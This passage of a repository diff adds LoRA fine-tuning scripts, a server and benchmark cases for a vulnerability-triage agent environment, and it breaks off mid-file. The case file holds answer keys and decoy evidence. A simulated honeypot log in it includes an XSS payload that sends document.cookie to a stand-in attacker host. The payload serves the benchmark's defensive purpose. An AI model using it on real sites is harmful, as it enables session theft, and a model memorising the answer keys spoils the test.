    print(json.dumps(payload, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
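Here the regex targets tqdm-style progress lines instead, deriving seconds-per-step from cumulative elapsed time rather than an instantaneous rate. An illustrative check (the progress line is fabricated for the example):

import re

STEP_RE = re.compile(r"(\d+)%\|.*?\|\s+(\d+)/(\d+)\s+\[(\d+):(\d+)<")

line = " 33%|###3      | 40/120 [12:30<25:00, 18.75s/it]"
pct, step, total, mins, secs = STEP_RE.search(line).groups()
print(int(mins) * 60 + int(secs), "s elapsed over", step, "of", total, "steps")
# -> 750 s elapsed over 40 of 120 steps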
scripts/start_mlx_training.sh
ADDED
@@ -0,0 +1,13 @@
#!/bin/zsh
set -euo pipefail

ROOT="/Users/adithyavardhan/Tweeks/hack"
cd "$ROOT"

mkdir -p artifacts/mlx_qwen3_4b/logs

python scripts/run_mlx_training.py \
  --model Qwen/Qwen3.5-4B \
  --output-root artifacts/mlx_qwen3_4b \
  --fresh-start \
  "$@"
scripts/train_lora_sft.py
ADDED
@@ -0,0 +1,261 @@
"""Run resumable LoRA SFT against the vulnops heuristic dataset."""

from __future__ import annotations

import argparse
import json
import math
import sys
from pathlib import Path
from typing import Dict, List

import torch
from torch.utils.data import Dataset
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    DataCollatorForSeq2Seq,
    Trainer,
    TrainerCallback,
    TrainingArguments,
)

ROOT = Path(__file__).resolve().parents[1]
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

from training_utils import (
    detect_device,
    latest_checkpoint,
    load_jsonl,
    preferred_torch_dtype,
    set_default_env,
    write_json,
)


class JsonlSFTDataset(Dataset):
    """Mask prompt tokens so only the completion contributes to the loss."""

    def __init__(self, records: List[Dict[str, object]], tokenizer, max_length: int):
        self.examples: List[Dict[str, List[int]]] = []
        for record in records:
            prompt = str(record["prompt"])
            completion = str(record["completion"])
            prompt_ids = tokenizer(prompt, add_special_tokens=False)["input_ids"]
            completion_ids = tokenizer(completion, add_special_tokens=False)["input_ids"] + [tokenizer.eos_token_id]

            input_ids = (prompt_ids + completion_ids)[:max_length]
            labels = ([-100] * len(prompt_ids) + completion_ids)[:max_length]
            attention_mask = [1] * len(input_ids)
            self.examples.append(
                {
                    "input_ids": input_ids,
                    "labels": labels,
                    "attention_mask": attention_mask,
                }
            )

    def __len__(self) -> int:
        return len(self.examples)

    def __getitem__(self, index: int) -> Dict[str, List[int]]:
        return self.examples[index]


class JsonlMetricLogger(TrainerCallback):
    """Append metrics during training so partial runs are still inspectable."""

    def __init__(self, output_root: Path):
        self.output_root = output_root
        self.metrics_path = output_root / "metrics" / "train_metrics.jsonl"
        self.manifest_path = output_root / "run_manifest.json"

    def on_log(self, args, state, control, logs=None, **kwargs):
        if not logs:
            return
        payload = {
            "global_step": int(state.global_step),
            "epoch": float(state.epoch or 0.0),
            **{key: float(value) if isinstance(value, (int, float)) else value for key, value in logs.items()},
        }
        self.metrics_path.parent.mkdir(parents=True, exist_ok=True)
        with self.metrics_path.open("a", encoding="utf-8") as handle:
            handle.write(json.dumps(payload, sort_keys=True) + "\n")
        write_json(
            self.manifest_path,
            {
                "status": "training",
                "global_step": int(state.global_step),
                "epoch": float(state.epoch or 0.0),
                "best_model_checkpoint": state.best_model_checkpoint,
                "log_history_entries": len(state.log_history),
            },
        )


class AbortOnInvalidLoss(TrainerCallback):
    """Stop training early when the run becomes numerically invalid."""

    def on_log(self, args, state, control, logs=None, **kwargs):
        if not logs:
            return control
        for key in ("loss", "eval_loss", "grad_norm"):
            value = logs.get(key)
            if isinstance(value, (int, float)) and not math.isfinite(float(value)):
                control.should_training_stop = True
                break
        return control


def build_training_args(args, output_root: Path, use_cpu: bool) -> TrainingArguments:
    warmup_steps = max(1, int(args.warmup_ratio * args.estimated_train_steps))
    return TrainingArguments(
        output_dir=str(output_root / "checkpoints"),
        num_train_epochs=args.num_train_epochs,
        per_device_train_batch_size=args.per_device_train_batch_size,
        per_device_eval_batch_size=args.per_device_eval_batch_size,
        gradient_accumulation_steps=args.gradient_accumulation_steps,
        learning_rate=args.learning_rate,
        warmup_steps=warmup_steps,
        optim="adamw_torch",
        weight_decay=args.weight_decay,
        logging_strategy="steps",
        logging_steps=args.logging_steps,
        logging_first_step=True,
        eval_strategy="no",
        save_strategy="steps",
        save_steps=args.save_steps,
        save_total_limit=3,
        report_to="none",
        remove_unused_columns=False,
        dataloader_num_workers=0,
        dataloader_pin_memory=False,
        gradient_checkpointing=True,
        lr_scheduler_type="cosine",
        load_best_model_at_end=False,
        use_cpu=use_cpu,
        fp16=False,
        bf16=False,
        max_grad_norm=0.5,
        seed=args.seed,
    )


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
    parser.add_argument("--max-length", type=int, default=1536)
    parser.add_argument("--num-train-epochs", type=float, default=6.0)
    parser.add_argument("--per-device-train-batch-size", type=int, default=1)
    parser.add_argument("--per-device-eval-batch-size", type=int, default=1)
    parser.add_argument("--gradient-accumulation-steps", type=int, default=8)
    parser.add_argument("--learning-rate", type=float, default=5e-5)
    parser.add_argument("--warmup-ratio", type=float, default=0.1)
    parser.add_argument("--weight-decay", type=float, default=0.0)
    parser.add_argument("--logging-steps", type=int, default=5)
    parser.add_argument("--save-steps", type=int, default=10)
    parser.add_argument("--seed", type=int, default=7)
    parser.add_argument("--fresh-start", action="store_true")
    args = parser.parse_args()

    try:
        from peft import LoraConfig, TaskType, get_peft_model
    except ImportError as exc:
        raise RuntimeError("Install peft before running LoRA training.") from exc

    output_root = (ROOT / args.output_root).resolve()
    data_dir = output_root / "data"
    train_records = load_jsonl(data_dir / "train.jsonl")
    eval_records = load_jsonl(data_dir / "eval.jsonl")
    if not train_records or not eval_records:
        raise RuntimeError("Missing train/eval JSONL data. Run scripts/generate_sft_data.py first.")

    set_default_env(output_root)
    device = detect_device()
    use_cpu = device == "cpu"
    torch_dtype = torch.float32 if device == "mps" else preferred_torch_dtype(device)

    tokenizer = AutoTokenizer.from_pretrained(args.model, trust_remote_code=True)
    if tokenizer.pad_token is None:
        tokenizer.pad_token = tokenizer.eos_token

    model = AutoModelForCausalLM.from_pretrained(
        args.model,
        torch_dtype=torch_dtype,
        trust_remote_code=True,
        low_cpu_mem_usage=True,
    )
    model.config.use_cache = False
    if hasattr(model, "enable_input_require_grads"):
        model.enable_input_require_grads()

    lora_config = LoraConfig(
        task_type=TaskType.CAUSAL_LM,
        r=16,
        lora_alpha=32,
        lora_dropout=0.05,
        target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
        bias="none",
    )
    model = get_peft_model(model, lora_config)

    if device in {"cuda", "mps"}:
        model.to(device)

    train_dataset = JsonlSFTDataset(train_records, tokenizer, args.max_length)
    eval_dataset = JsonlSFTDataset(eval_records, tokenizer, args.max_length)
    data_collator = DataCollatorForSeq2Seq(tokenizer=tokenizer, model=model, padding=True)
    updates_per_epoch = max(
        1,
        math.ceil(len(train_dataset) / (args.per_device_train_batch_size * args.gradient_accumulation_steps)),
    )
    args.estimated_train_steps = max(1, math.ceil(args.num_train_epochs * updates_per_epoch))
    training_args = build_training_args(args, output_root, use_cpu)

    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=train_dataset,
        eval_dataset=eval_dataset,
        processing_class=tokenizer,
        data_collator=data_collator,
        callbacks=[JsonlMetricLogger(output_root), AbortOnInvalidLoss()],
    )

    checkpoint_dir = output_root / "checkpoints"
    resume_checkpoint = None if args.fresh_start else latest_checkpoint(checkpoint_dir)
    write_json(
        output_root / "run_manifest.json",
        {
            "status": "starting_training",
            "device": device,
            "model": args.model,
            "train_examples": len(train_dataset),
            "eval_examples": len(eval_dataset),
            "estimated_train_steps": args.estimated_train_steps,
            "resume_checkpoint": str(resume_checkpoint) if resume_checkpoint else None,
        },
    )

    train_result = trainer.train(resume_from_checkpoint=str(resume_checkpoint) if resume_checkpoint else None)
    trainer.save_model(str(output_root / "adapter"))
    tokenizer.save_pretrained(str(output_root / "adapter"))

    final_eval = trainer.evaluate(eval_dataset=eval_dataset)
    summary = {
        "status": "finished",
        "device": device,
        "train_loss": float(train_result.training_loss),
        "global_step": int(trainer.state.global_step),
        "eval_loss": float(final_eval["eval_loss"]) if math.isfinite(float(final_eval["eval_loss"])) else None,
        "adapter_dir": str(output_root / "adapter"),
    }
    write_json(output_root / "training_summary.json", summary)
    write_json(output_root / "run_manifest.json", summary)
    print(json.dumps(summary, indent=2, sort_keys=True))


if __name__ == "__main__":
    main()
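The -100 labels are what make this prompt-masked SFT rather than plain language modeling: HuggingFace's cross-entropy loss ignores positions labeled -100, so only completion tokens (plus the appended EOS) are trained on. A minimal sketch of the alignment built in JsonlSFTDataset, with made-up token ids in place of a tokenizer:

IGNORE_INDEX = -100
prompt_ids = [101, 102, 103]     # loss is ignored over these positions
completion_ids = [201, 202, 2]   # 2 standing in for eos_token_id
max_length = 8

input_ids = (prompt_ids + completion_ids)[:max_length]
labels = ([IGNORE_INDEX] * len(prompt_ids) + completion_ids)[:max_length]
assert len(input_ids) == len(labels)
print(input_ids)  # [101, 102, 103, 201, 202, 2]
print(labels)     # [-100, -100, -100, 201, 202, 2]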
server/Dockerfile
ADDED
@@ -0,0 +1,32 @@
FROM python:3.11-slim AS builder

ENV PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1 \
    PIP_NO_CACHE_DIR=1

WORKDIR /app/env

RUN python -m pip install --no-cache-dir uv

COPY . /app/env

RUN --mount=type=cache,target=/root/.cache/uv \
    uv sync --frozen --no-dev --no-editable


FROM python:3.11-slim

ENV PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1 \
    PATH="/app/.venv/bin:$PATH" \
    PYTHONPATH="/app/env"

WORKDIR /app

COPY --from=builder /app/env/.venv /app/.venv
COPY --from=builder /app/env /app/env

HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
    CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health', timeout=2)" || exit 1

CMD ["sh", "-c", "cd /app/env && uvicorn server.app:app --host 0.0.0.0 --port 8000"]
server/__init__.py
ADDED
@@ -0,0 +1 @@
"""Server package for the vulnerability triage environment."""
server/app.py
ADDED
@@ -0,0 +1,34 @@
"""FastAPI app for the vulnerability triage environment."""

from __future__ import annotations

try:
    from openenv.core.env_server.http_server import create_app
except Exception as exc:  # pragma: no cover
    raise ImportError("openenv-core is required to run this server") from exc

try:
    from ..models import VulnTriageAction, VulnTriageObservation
    from .vuln_triage_env_environment import VulnTriageEnvironment
except (ModuleNotFoundError, ImportError):
    from models import VulnTriageAction, VulnTriageObservation
    from server.vuln_triage_env_environment import VulnTriageEnvironment


app = create_app(
    VulnTriageEnvironment,
    VulnTriageAction,
    VulnTriageObservation,
    env_name="vulnops",
    max_concurrent_envs=4,
)


def main(host: str = "0.0.0.0", port: int = 8000) -> None:
    import uvicorn

    uvicorn.run(app, host=host, port=port)


if __name__ == "__main__":
    main()
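A quick liveness probe against a locally running server, mirroring the container HEALTHCHECK in server/Dockerfile. It assumes the /health route that the health check already targets and the port from main()'s default, and that the app is running (e.g. via python -m server.app):

import urllib.request

with urllib.request.urlopen("http://localhost:8000/health", timeout=2) as response:
    print(response.status, response.read().decode("utf-8"))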
server/cases.py
ADDED
@@ -0,0 +1,742 @@
"""Live-backed benchmark cases for vulnerability triage."""

from __future__ import annotations

from dataclasses import dataclass, field
from functools import lru_cache
import json
from pathlib import Path
import random
from typing import Dict, List, Optional

import requests


OSV_VULN_URL = "https://api.osv.dev/v1/vulns/{osv_id}"
NVD_CVE_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"
EPSS_URL = "https://api.first.org/data/v1/epss"
SNAPSHOT_DIR = Path(__file__).resolve().parent.parent / "data" / "snapshots"


@dataclass(frozen=True)
class GroundTruth:
    validity: str
    affected_package: str
    affected_versions: str
    severity: str
    exploitability: str
    next_action: str
    missing_information: List[str] = field(default_factory=list)
    supporting_evidence_ids: List[str] = field(default_factory=list)


@dataclass(frozen=True)
class CaseDefinition:
    task_id: str
    difficulty: str
    title: str
    objective: str
    report_summary: str
    max_steps: int
    evidence: List[Dict[str, str]]
    truth: GroundTruth


@dataclass(frozen=True)
class RuntimeCaseSeed:
    task_id: str
    difficulty: str
    title: str
    objective: str
    max_steps: int
    osv_id: str
    next_action: str
    fallback_snapshot: Dict[str, object]
    missing_information: List[str] = field(default_factory=list)
    # When set, completely replaces the auto-computed ground truth.
    # Use this to encode scenarios that require non-obvious reasoning
    # (e.g. next_action=request_info when no patch exists).
    truth_override: Optional[Dict[str, object]] = None
    # Extra evidence items injected after the auto-built ones.
    # Use this to add contradictory or ambiguous signals.
    extra_evidence: List[Dict[str, str]] = field(default_factory=list)


def _load_snapshot_file(osv_id: str) -> Optional[Dict[str, object]]:
    path = SNAPSHOT_DIR / f"{osv_id}.json"
    if not path.exists():
        return None
    return json.loads(path.read_text())


def _normalize_text(value: Optional[str]) -> str:
    return " ".join((value or "").strip().split())


def _shorten(text: str, limit: int = 280) -> str:
    text = _normalize_text(text)
    if len(text) <= limit:
        return text
    return text[: limit - 3].rstrip() + "..."


def _severity_band(snapshot: Dict[str, object]) -> str:
    severity = _normalize_text(str(snapshot.get("severity", ""))).lower()
    mapping = {
        "none": "low",
        "low": "low",
        "medium": "medium",
        "moderate": "medium",
        "high": "high",
        "critical": "critical",
    }
    return mapping.get(severity, "medium")


def _exploitability_band(snapshot: Dict[str, object]) -> str:
    percentile = float(snapshot.get("epss_percentile", 0.0) or 0.0)
    if percentile >= 0.9:
        return "high"
    if percentile >= 0.6:
        return "medium"
    return "low"


def _range_string(ranges: List[Dict[str, object]]) -> str:
    normalized: List[str] = []
    for range_item in ranges:
        if range_item.get("type") != "ECOSYSTEM":
            continue
        introduced: Optional[str] = None
        fixed: Optional[str] = None
        last: Optional[str] = None
        for event in range_item.get("events", []):
            if "introduced" in event:
                introduced = str(event["introduced"])
            if "last_affected" in event:
                last = str(event["last_affected"])
            if "fixed" in event:
                fixed = str(event["fixed"])
        if introduced in (None, "0") and fixed:
            normalized.append(f"<{fixed}")
        elif introduced and fixed:
            normalized.append(f">={introduced},<{fixed}")
        elif introduced and last:
            normalized.append(f">={introduced},<={last}")
        elif introduced:
            normalized.append(f">={introduced}")
    return " ; ".join(normalized) or "unknown"


def _all_affected_versions(snapshot: Dict[str, object]) -> str:
    """Collect version ranges from every affected block for the primary package.

    OSV advisories sometimes split a single package across multiple affected
    blocks (one per release branch). Joining them all gives a complete and
    accurate truth value instead of just the first branch.
    """
    package_name = _extract_package(snapshot)
    all_ranges: List[str] = []
    for block in snapshot.get("affected", []):
        pkg = block.get("package", {})
        if str(pkg.get("name", "")) == package_name:
            rs = _range_string(block.get("ranges", []))
            if rs and rs != "unknown":
                all_ranges.append(rs)
    return " ; ".join(all_ranges) if all_ranges else "unknown"


def _extract_cve_id(snapshot: Dict[str, object]) -> Optional[str]:
    for alias in snapshot.get("aliases", []):
        alias_text = str(alias)
        if alias_text.startswith("CVE-"):
            return alias_text
    return None


def _extract_package(snapshot: Dict[str, object]) -> str:
    affected = snapshot.get("affected", [])
    if not affected:
        return ""
    package = affected[0].get("package", {})
    return str(package.get("name", ""))


def _build_report_summary(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> str:
    package = _extract_package(snapshot)
    versions = (
        _range_string(snapshot.get("affected", [{}])[0].get("ranges", []))
        if snapshot.get("affected")
        else "unknown"
    )
    details = _shorten(str(snapshot.get("details") or snapshot.get("summary") or ""))
    return (
        f"{package} vulnerability triage case sourced from {seed.osv_id}. "
        f"Affected versions: {versions}. {details}"
    )


def _build_evidence(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> List[Dict[str, str]]:
    cve_id = _extract_cve_id(snapshot) or "unknown"
    package = _extract_package(snapshot)
    # Use all affected blocks so multi-branch advisories are fully represented
    affected_versions = _all_affected_versions(snapshot)
    fix_refs = [
        ref["url"]
        for ref in snapshot.get("references", [])
        if ref.get("type") in {"FIX", "ADVISORY", "WEB"}
    ][:3]

    evidence = [
        {
            "evidence_id": "osv_advisory",
            "title": "OSV advisory",
            "kind": "advisory",
            "summary": _shorten(
                str(snapshot.get("summary") or snapshot.get("details") or "")
            ),
        },
        {
            "evidence_id": "affected_versions",
            "title": "Affected versions",
            "kind": "versions",
            "summary": (
                f"OSV lists {package} as affected in these ranges: {affected_versions}."
            ),
        },
        {
            "evidence_id": "nvd_assessment",
            "title": "NVD assessment",
            "kind": "severity",
            "summary": (
                f"NVD CVSS Vector: {snapshot.get('cvss_vector', 'Not Available')} \n"
                f"{_shorten(str(snapshot.get('nvd_description', '')), 220)}"
            ),
        },
        {
            "evidence_id": "epss_signal",
            "title": "EPSS signal",
            "kind": "exploitability",
            "summary": (
                f"EPSS score: {snapshot.get('epss_score', 0.0):.6f}, "
                f"percentile: {snapshot.get('epss_percentile', 0.0):.3f}"
            ),
        },
    ]
    if fix_refs:
        evidence.append(
            {
                "evidence_id": "fix_reference",
                "title": "Fix and advisory references",
                "kind": "reference",
                "summary": "Relevant upstream references: " + ", ".join(fix_refs),
            }
        )
    # Append any task-specific extra evidence items (e.g. contradictory signals)
    evidence.extend(seed.extra_evidence)
    return evidence


def _build_truth(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> GroundTruth:
    # truth_override lets a seed encode non-obvious ground truth
    # (e.g. next_action=request_info when no patch exists yet)
    if seed.truth_override is not None:
        override = dict(seed.truth_override)
        # Always merge seed-level missing_information into the override so the
        # grader's 10% weight stays meaningful
        if "missing_information" not in override:
            override["missing_information"] = list(seed.missing_information)
        return GroundTruth(**override)
    return GroundTruth(
        validity="valid",
        affected_package=_extract_package(snapshot),
        # Collect ranges from ALL affected blocks for completeness
        affected_versions=_all_affected_versions(snapshot),
        severity=_severity_band(snapshot),
        exploitability=_exploitability_band(snapshot),
        next_action=seed.next_action,
        # Per-task missing information declared on the seed
        missing_information=list(seed.missing_information),
        supporting_evidence_ids=[
            "osv_advisory",
            "affected_versions",
            "nvd_assessment",
            "epss_signal",
        ],
    )


def _build_case(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> CaseDefinition:
    return CaseDefinition(
        task_id=seed.task_id,
        difficulty=seed.difficulty,
        title=seed.title,
        objective=seed.objective,
        report_summary=_build_report_summary(seed, snapshot),
        max_steps=seed.max_steps,
        evidence=_build_evidence(seed, snapshot),
        truth=_build_truth(seed, snapshot),
    )


def _fetch_json(url: str, *, params: Optional[Dict[str, str]] = None) -> Dict[str, object]:
    response = requests.get(url, params=params, timeout=12)
    response.raise_for_status()
    return response.json()


def _fetch_live_snapshot(seed: RuntimeCaseSeed) -> Dict[str, object]:
    osv = _fetch_json(OSV_VULN_URL.format(osv_id=seed.osv_id))
    cve_id = _extract_cve_id(osv)

    snapshot: Dict[str, object] = {
        "id": osv.get("id"),
        "summary": osv.get("summary"),
        "details": osv.get("details"),
        "aliases": osv.get("aliases", []),
        "references": osv.get("references", []),
        "affected": osv.get("affected", []),
    }

    if cve_id:
        nvd = _fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
        vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
        metrics = vulnerability.get("metrics", {})
        severity: Optional[str] = None
        for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
            if key in metrics:
                item = metrics[key][0]
                severity = (
                    item.get("cvssData", {}).get("baseSeverity")
                    or item.get("baseSeverity")
                )
                if severity:
                    break
        descriptions = vulnerability.get("descriptions", [])
        nvd_description = next(
            (
                desc.get("value", "")
                for desc in descriptions
                if desc.get("lang") == "en"
            ),
            descriptions[0].get("value", "") if descriptions else "",
        )
        snapshot["severity"] = severity or snapshot.get("severity", "medium")
        snapshot["nvd_description"] = nvd_description

        epss = _fetch_json(EPSS_URL, params={"cve": cve_id})
        epss_item = (epss.get("data") or [{}])[0]
        snapshot["epss_score"] = float(epss_item.get("epss", 0.0) or 0.0)
        snapshot["epss_percentile"] = float(
            epss_item.get("percentile", 0.0) or 0.0
        )
    else:
        snapshot["severity"] = "medium"
        snapshot["nvd_description"] = ""
        snapshot["epss_score"] = 0.0
        snapshot["epss_percentile"] = 0.0

    return snapshot


SEEDS: Dict[str, RuntimeCaseSeed] = {
    # ------------------------------------------------------------------
    # EASY — Direct evidence reading, tight step budget
    #
    # Agent skill tested: can you read a clear advisory and map it to
    # the right fields quickly? Only two evidence items are needed
    # (the OSV advisory + affected versions). The NVD and EPSS evidence
    # exist but provide no extra signal — a capable agent doesn't waste
    # steps on them. Max 10 steps forces efficiency.
    # ------------------------------------------------------------------
    "task_easy_guarddog": RuntimeCaseSeed(
        task_id="task_easy_guarddog",
        difficulty="easy",
        title="GuardDog Path Traversal",
        objective=(
            "Validate the advisory, identify the affected package and version range, "
            "estimate severity and exploitability, and decide the correct maintainer action. "
            "All necessary information is available in the OSV advisory and version evidence."
        ),
        max_steps=10,
        osv_id="PYSEC-2022-42994",
        next_action="patch",
        truth_override={
            "validity": "valid",
            "affected_package": "guarddog",
            "affected_versions": "<0.1.5",
            "severity": "medium",
            "exploitability": "low",
            "next_action": "patch",
            "missing_information": [],
            # Only 2 evidence items needed — the advisory is self-contained
            "supporting_evidence_ids": ["osv_advisory", "affected_versions"],
        },
        extra_evidence=[
            {
                "evidence_id": "decoy_threat_intel",
                "title": "Threat Intel: GuardCat",
                "kind": "exploitability",
                "summary": "Active exploitation in the wild observed for the 'GuardCat' node.js package. Do not confuse with python guarddog.",
            },
            {
                "evidence_id": "decoy_nvd_unrelated",
                "title": "NVD: CVE-2021-99999",
                "kind": "severity",
                "summary": "CRITICAL 9.8 vulnerability in GuardDog-Enterprise. This is a licensed product and does not apply to the open source guarddog package.",
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2022-42994",
            "details": (
                "GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior "
                "to 0.1.5 are vulnerable to Relative Path Traversal when scanning a "
                "specially-crafted local PyPI package. This issue is patched in version 0.1.5. "
                "This is explicitly rated as a Medium severity issue with inherently Low exploitability."
            ),
            "aliases": ["CVE-2022-23531", "GHSA-rp2v-v467-q9vq"],
            "references": [
                {"type": "WEB", "url": "https://github.com/DataDog/guarddog/releases/tag/v0.1.5"},
                {"type": "ADVISORY", "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq"},
                {"type": "FIX", "url": "https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306"},
            ],
            "affected": [
                {
                    "package": {"name": "guarddog", "ecosystem": "PyPI"},
                    "ranges": [
                        {
                            "type": "ECOSYSTEM",
                            "events": [{"introduced": "0"}, {"fixed": "0.1.5"}],
                        }
                    ],
                }
            ],
            "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "nvd_description": (
                "GuardDog versions prior to 0.1.5 are vulnerable to relative path traversal "
                "when scanning a specially-crafted local PyPI package."
            ),
            "epss_score": 0.00152,
            "epss_percentile": 0.36042,
        },
    ),

    # ------------------------------------------------------------------
    # MEDIUM — Conflicting signal resolution, multi-branch versions
    #
    # Agent skill tested: can you weigh contradictory evidence? The
    # EPSS percentile (0.43) maps to "low" exploitability by the formula,
    # but an injected threat-intel evidence item reports real-world active
    # probing. The correct answer is "medium" exploitability because
    # independent field evidence overrides a lagging statistical signal.
    # All four auto-built evidence items PLUS the threat_intel_signal are
    # needed — a model that submits after reading only EPSS will be wrong.
    # ------------------------------------------------------------------
    "task_medium_invenio": RuntimeCaseSeed(
        task_id="task_medium_invenio",
        difficulty="medium",
        title="Invenio Multi-Branch XSS",
        objective=(
            "Resolve affected versions across multiple maintained release lines, weigh "
            "a conflicting exploitability signal, and choose the correct advisory workflow. "
            "The EPSS percentile and the threat-intelligence report disagree — inspect both "
            "before deciding on exploitability."
        ),
        max_steps=14,
        osv_id="GHSA-vxh3-mvv7-265j",
        next_action="publish_advisory",
        truth_override={
            "validity": "valid",
            "affected_package": "invenio-records",
            "affected_versions": "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
            "severity": "medium",
            # KEY: EPSS alone says "low" (0.43 percentile) but the injected
            # threat-intel evidence documents active real-world probing.
            # A model that reads only EPSS will score 0 on exploitability.
            "exploitability": "medium",
            "next_action": "publish_advisory",
            "missing_information": [],
            "supporting_evidence_ids": [
                "osv_advisory",
                "affected_versions",
                "nvd_assessment",
                "threat_intel_signal",
                "github_commit_diff",
            ],
        },
        extra_evidence=[
            {
                "evidence_id": "github_commit_diff",
                "title": "GitHub Commit a93b12f",
                "kind": "reference",
                "summary": (
                    "```diff\n"
                    "@@ -101,3 +101,3 @@\n"
                    "- html = \"<div class='record-data'>{}</div>\".format(json.dumps(record.metadata))\n"
                    "+ html = \"<div class='record-data'>{}</div>\".format(escape(json.dumps(record.metadata)))\n"
                    "  return Markup(html)\n"
                    "```"
                )
            },
            {
                "evidence_id": "decoy_nvd_invenio_accounts",
                "title": "NVD Entry for invenio-accounts",
                "kind": "severity",
                "summary": "CVE-2018-9999: invenio-accounts allows SQL injection. Severity CRITICAL. (Note: this is a decoy for a different package in the same ecosystem)."
            },
            {
                "evidence_id": "threat_intel_signal",
                "title": "Threat intelligence report",
                "kind": "exploitability",
                "summary": (
                    "Honeypot logs captured within 72 hours of publication:\n"
                    "[WARN] SRC: 198.51.100.41 URI: /admin/api/records POST payload: {\"title\": \"<script>fetch('http://atk.example/p?c='+document.cookie)</script>\"}\n"
                    "[WARN] SRC: 203.0.113.88 URI: /admin/api/records POST payload: {\"title\": \"<img src=x onerror=alert(1)>\"}\n"
                    "Evidence of active, weaponised scanning in the wild."
                ),
            }
        ],
        fallback_snapshot={
            "id": "GHSA-vxh3-mvv7-265j",
            "summary": "Rendering vulnerability in invenio-records",
            "details": (
                "A vulnerability was discovered when rendering JSON for "
                "a record in the administration interface. All supported versions have been "
                "patched and users should upgrade to v1.0.1, v1.1.1, or v1.2.2 depending on "
                "their release line. Review the commit diff to determine the exact vulnerability type."
            ),
            "aliases": ["CVE-2019-1020003", "PYSEC-2019-27"],
            "references": [
                {"type": "WEB", "url": "https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j"},
                {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1020003"},
            ],
            "affected": [
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.0.2"}]},
                    ],
                },
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]},
                    ],
                },
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.2.0"}, {"fixed": "1.2.2"}]},
                    ],
                },
            ],
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
            "nvd_description": "invenio-records before 1.2.2 allows XSS.",
            "epss_score": 0.00206,
            "epss_percentile": 0.42837,
        },
    ),

    # ------------------------------------------------------------------
    # HARD — Recognizing uncertainty, resisting premature action
    #
    # Agent skill tested: can you decide NOT to act when information is
    # missing? This case simulates an early-disclosure scenario where
    # the vulnerability is confirmed (validity=valid) but NO PATCH HAS
    # BEEN RELEASED. The vendor_status evidence explicitly states this.
    # Publishing an advisory with no fixed version would be wrong —
    # it alarms users with no actionable remediation path.
    #
    # The correct answer is next_action=request_info.
    # A model that blindly pattern-matches "real CVE → publish_advisory"
    # will lose the 15% next_action weight. A model that reads the
    # vendor_status evidence and recognises the missing patch will
    # choose request_info and score full marks.
    #
    # The affected_versions ">=0" (no fixed marker) is a cue that the
    # snapshot encodes. Smart agents notice it.
    # ------------------------------------------------------------------
    "task_hard_gradio": RuntimeCaseSeed(
        task_id="task_hard_gradio",
        difficulty="hard",
        title="Gradio XSS — Patch Pending, No Fix Released",
        objective=(
            "Triage a confirmed vulnerability in a widely deployed package where no patch "
            "has been published yet. Determine validity, read all evidence including the "
            "upstream vendor status report, identify what information is missing, and choose "
            "whether to publish an advisory now or request upstream action first."
        ),
        max_steps=18,
        osv_id="PYSEC-2024-220",
        next_action="request_info",
        missing_information=[
            "no fixed version published by upstream maintainer",
            "CVSSv4 score not yet assessed for CVE-2024-47872",
            "no public proof-of-concept exploit code referenced",
        ],
        truth_override={
            "validity": "valid",
            "affected_package": "gradio",
            # All versions affected — no fix exists yet in this scenario
            "affected_versions": ">=0",
            "severity": "medium",
            # EPSS unavailable (score=0, percentile=0) → default low
            "exploitability": "low",
            # KEY: publishing an advisory with no fixed version is wrong.
            # The analyst must contact the maintainer first.
            "next_action": "request_info",
            "missing_information": [
                "no fixed version published by upstream maintainer",
                "CVSSv4 score not yet assessed for CVE-2024-47872",
                "no public proof-of-concept exploit code referenced",
            ],
            "supporting_evidence_ids": ["osv_advisory", "vendor_status"],
        },
        extra_evidence=[
            {
                "evidence_id": "vendor_status",
                "title": "Upstream maintainer status",
                "kind": "reference",
                "summary": (
                    "GitHub Issue #1289 (gradio-app/gradio):\n\n"
                    "@reporter: Attached PoC shows XSS execution upon SVG upload. Can we get this fixed?\n"
                    "@maintainer: Thanks for the report. I can confirm the behavior in the current release. "
                    "We need to completely rewrite the file upload sanitizer to properly fix this without "
                    "breaking backwards compatibility. No ETA on the rewrite yet, so we don't have a patch ready."
                ),
